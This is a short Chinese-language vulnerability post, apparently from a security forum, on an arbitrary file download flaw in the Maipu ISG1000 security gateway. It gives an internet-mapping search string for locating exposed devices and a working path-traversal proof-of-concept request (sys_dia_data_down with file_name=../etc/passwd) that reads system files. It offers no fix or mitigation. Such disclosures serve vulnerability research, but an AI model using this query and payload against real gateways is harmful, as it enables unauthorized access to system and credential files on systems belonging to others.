迈普 ISG1000安全网关 sys_dia_data_down 任意文件下载漏洞

# 迈普 ISG1000安全网关 sys_dia_data_down 任意文件下载漏洞 ## 漏洞描述 迈普 ISG1000安全网关 存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件 ## 漏洞影响 迈普 I...

迈普 ISG1000安全网关 sys_dia_data_down 任意文件下载漏洞

漏洞描述

迈普 ISG1000安全网关 存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件

漏洞影响

迈普 ISG1000安全网关

网络测绘

title="迈普通信技术股份有限公司"

漏洞复现

登录页面如下

img

请求的 POC 为

/webui/?g=sys_dia_data_down&file_name=../etc/passwd

img

若有收获,就点个赞吧

  • 发表于 2024-07-12 18:50:14
  • 阅读 ( 2573 )
  • 分类:网络设备

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计